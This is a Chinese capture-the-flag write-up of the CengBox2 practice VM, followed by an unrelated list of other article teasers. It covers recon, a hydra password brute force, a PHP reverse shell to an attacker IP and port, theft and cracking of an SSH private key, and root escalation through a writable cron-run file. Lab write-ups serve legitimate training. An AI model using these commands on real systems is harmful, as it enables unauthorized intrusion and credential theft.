cengbox2靶机(hydra爆破、公私钥免密登录)

news2024/9/22 18:31:27

环境准备

靶机链接:百度网盘 请输入提取码

提取码:zdpr

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.arp-scan -l探测目标靶机ip

2.nmap -p- -A -T4 192.168.1.107

探测目标靶机开放端口和服务

3.gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 50

用gobuster扫描目录,啥也没有

漏洞探测

1.登录ftp,将note.txt下载下来

2.得到俩个名字kevin Aaron 和一个域名

3.把域名添加到/etc/hosts

4.wfuzz -H 'HOST: FUZZ.ceng-company.vm' -u 'http://ceng-company.vm/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 53,76

用wfuzz进行子域名探索 --hw是不搜集53,76 扫出的admin添加到/etc/hosts

5.gobuster dir -u http://admin.ceng-company.vm \ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

扫描子域目录,发现gila

6.gobuster dir -u http://admin.ceng-company.vm/gila -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50

扫描查出gila下的目录

7.尝试sql注入失败,用暴力破解,根据note.txt文件大概知道用户名是邮箱格式

8.hydra -l kevin@ceng-company.vm -P /usr/share/wordlists/rockyou.txt admin.ceng-company.vm http-post-form '/gila/admin/:username=kevin@ceng-company.vm&password=^PASS^:Wrong email or password' -vV -f

9.很尴尬我破解出来的密码居然是love4eva ,因为这个过程很漫长,我开启天眼模式已经知道密码admin,并登录进去。

我做完靶机之后再访问网页的时候用love4eva登录一下,神奇的事情发生了,网页居然找不到了,还报错!!可能这个用户有俩密码把。

漏洞利用

1.把index.php页面改成php-reverse-shell.php(自行谷歌可以找到)的内容

2.点击报错,成功反弹shell,看到swartz有些权限

3.看了看好像啥也没有,自己存侥幸心理sudo -l 一下,他还真有!

(swartz) NOPASSWD: /home/swartz/runphp.sh

4.他可以不需要密码就可以执行这个文件

sudo -u swartz /home/swartz/runphp.sh

发现进入了一个php命令里,那就直接反弹shell把!(自行谷歌php reverse shell)

php -r '$sock=fsockopen("192.168.1.106",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

权限提升

1.进入之后,进入mitnick,发现.ssh文件夹,存放公私钥的地方!

2.python3 -m http.server

wget http://192.168.1.107:8000/id_rsa

开放8000端口,下载下来私钥,进行ssh登录

3.john --wordlist=/usr/share/wordlists/rockyou.txt hash

发现登录的时候要密码,那用john破解下得到密码 legend

4.ssh mitnick@192.168.1.107 -i id_rsa

再次登录还报错,给私钥400权限就行了

5.查看以suid权限执行命令的文件,没有可以利用的

find / -perm -u=s -type f 2>/dev/null

我看好多博主用的find / -type f -perm -g+rwx 2>/dev/null 这个命令,也是可以的 查找用户组下rwx权限

6.上传pspy64检查程序,发现一个以root权限执行的命令cp

7.分别查看这俩个文件

8.这个权限挺高,满权限

9.把提权命令写进去

10.写入后查看,退出去,重新登录

11./bin/bash -p 成功提权

成功拿到root.txt,成功拿下!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/67735.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Docker基本使用

1、centos7安装docker engine 参考文档&#xff1a;https://docs.docker.com/engine/install/centos/ &#xff08;1&#xff09;卸载之前的docker sudo yum remove docker \docker-client \docker-client-latest \docker-common \docker-latest \docker-latest-logrotate \…

Spring——AOP

Spring中的可插拔组件技术 Spring AOP Spring AOP——Aspect Oriented Programming 面向切面编程AOP 的做法是将通用的、与业务无关的功能抽象封装为切面层切面可配置在目标方法执行前后&#xff0c;做到即插即用 不修改源码对程序功能进行拓展 AoP的关键概念 Spring AoP 与A…

栈与队列3:有效的括号

主要是我自己刷题的一些记录过程。如果有错可以指出哦&#xff0c;大家一起进步。 转载代码随想录 原文链接&#xff1a; 代码随想录 leetcode链接&#xff1a;20. 有效的括号 题目&#xff1a; 给定一个只包括 ‘(’&#xff0c;‘)’&#xff0c;‘{’&#xff0c;‘}’&am…

怎样才能批量查询网站的谷歌PR权重?把手教你批量查询网站谷歌PR权重值

谷歌PR是Google排名运算法则&#xff08;排名公式&#xff09;的一部分&#xff0c;用来标识网页的等级/重要性。在计算网站排名时&#xff0c;PageRank会将网站的外部链接数考虑进去。一个网站的外部链接数越多其PR值就越高&#xff1b;外部链接站点的级别越高&#xff0c;网站…

docker安装nginx代理nacos2.1.2版本集群

目录 安装docker最新版本 创建一个docker network&#xff0c;使之固定docker局域ip docker安装mysql主从 配置挂载的my.cnf配置文件 进入mysql主数据库容器命令 登录主数据库创建用于从数据连接主数据的账号密码 输入show master status;查看master数据库状态 在从数据库…

基于训练和推理场景下的MindStudio高精度对比

摘要&#xff1a;MindStudio提供精度比对功能&#xff0c;支持Vector比对能力。本文分享自华为云社区《【MindStudio训练营第一季】MindStudio 高精度对比随笔》&#xff0c;作者&#xff1a;Tianyi_Li。 训练场景下&#xff0c;迁移原始网络 (如TensorFlow、PyTorch) &#x…

[附源码]Python计算机毕业设计SSM家纺商品展示平台(程序+LW)

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

连锁门店进销存软件的用途

门店式经营对于很多经营有道的老板来说是第一步&#xff0c;在规模扩张中&#xff0c;生意越做越大。这时要想拓宽销路&#xff0c;让收益更上一层楼&#xff0c;连锁、分店确实是一种行之有效的方法。 多门店管理经营存在的长久性难点是决策性工作量激增&#xff0c;管理方面…

[附源码]计算机毕业设计勤工俭学管理小程序Springboot程序

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

Multimodal Token Fusion for Vision Transformers

水平太浅&#xff0c;理解不到位。谨慎观看。 多模态token融合&#xff0c;我是语义分割&#xff0c;只看RGB和Depth模态。 1&#xff1a;作者为了解决transformer多输入的问题&#xff0c;对基于transformer视觉任务进行剪枝&#xff0c;为了有效的融合多模态&#xff0c;toke…

Docker(一) ----初始Docker

文章目录前言一、什么是 Docker1.1 Docker 的定义1.2 Docker对于上述问题的解决二、Docker 与虚拟机三、Docker 架构3.1 镜像和容器3.2 Docker 和 Docker Hub3.3 Docker 架构四、安装Docker4.1 卸载 (可选)4.2 安装Docker4.3 启动 Docker4.4 配置镜像加速总结前言 本文章主要是…

艾美捷肝细胞培养基试剂盒说明书

肝细胞培养基是专门为正常人类肝细胞体外培养设计的最适于其生长的培养基&#xff0c;是经灭菌的液体培养基&#xff0c;包含必需和非必需氨基酸、维生素、有机和无机化合物、激素、生长因子、微量矿物质和低浓度胎牛血清(5%)。 艾美捷肝细胞培养基试剂盒为我们的大鼠肝细胞设计…

WIN10商业版64位22H2正式版19045.2251MSDN11月原版镜像

微软表示 Windows 10 是迄今为止最好的 Windows 操作系统。无论你是普通办公用户、游戏玩家还是开发者&#xff0c;Win10 都能带给你目前最先进的功能特性以及使用体验。 其实微软对 Windows 10 版本的命名一直没有什么统一标准&#xff0c;最新的「22H2」是以开发代号命名的。…

【JavaWeb开发-Servlet】day02-使用eclipse实现Servlet开发

目录 1、安装IDE-eclipse编译器 2、配置IDE开发环境 &#xff08;1&#xff09;使用eclipse关联Tomcat服务器 &#xff08;2&#xff09;使用Servlet访问Hello World页面 &#xff08;3&#xff09;Java中常用的方法调用方式 &#xff08;4&#xff09;Java中常用的反射机…

web3.0学习入门7:深入学习Web3.0

Web3.0背景 2个大事件&#xff1a; 1、2021年10月28日&#xff0c;月活破30亿的Facebook正式官宣改名为Meta&#xff0c;元宇宙和Web3等概念正式从币圈破圈&#xff1b; 2、2021年12月8日&#xff0c;美国众议院加密金融听证会有议员喊出“确保Web3.0革命发生在美国”&#…

数字图像处理实验(二)|图像变换(附实验代码和截图)

文章目录一、实验目的二、主要仪器设备三、实验原理&#xff08;一&#xff09;变换原理1.离散傅里叶变换2.离散余弦变换3.频谱平移&#xff08;二&#xff09;频谱分析原理四、实验步骤和内容1. 为下面三段程序写出注释并上机运行&#xff0c;将实际运行结果如实记录到实验报告…

《数据结构》队列

学习目录队列队列的概念队列的使用(Queue)队列的模拟实现循环队列双端队列&#xff08;Deque&#xff09;面试题队列 队列的概念 队列是一种先进先出&#xff0c;后进后出的特点&#xff0c;是只允许在一端进行插入数据操作&#xff0c;在另一端进行删除数据操作的特殊线性表…

selenium使用

selenium使用一 bs4搜索文档树二 css选择器三 selenium基本使用四 无界面浏览器五 selenium其它用法5.1 登录百度5.2 获取位置属性大小&#xff0c;文本5.3 元素操作5.4 执行js代码5.5 切换选项卡5.6 浏览器前进后退5.7 异常处理六 selenium登录cnblogs获取cookie七 抽屉半自动…

kubernetes使用(1.25)

kubernetes使用&#xff08;1.25&#xff09; 内核是AMD、ARM、 $ arch uname -a 注&#xff1a;x86_64,x64,AMD64基本上是同一个东西 K8S 核心概念 Kubernetes有很多核心概念&#xff0c;我们先看下几个核心的概念。其他概念可以看一下我的安装文档 Deployment Deploy…

实现国产化转型,ZStack Cloud 助力中铁财务数字化转型!

中铁财务是中国中铁旗下的金融服务核心企业&#xff0c;随着新业务的快速发展&#xff0c;原有的烟囱式架构使得资源利用率相对较低&#xff0c;难以与其他系统有效协调工作。基于国产化布局的需要&#xff0c;中铁财务选择了 ZStack Cloud 云平台&#xff0c;在充分利旧的基础…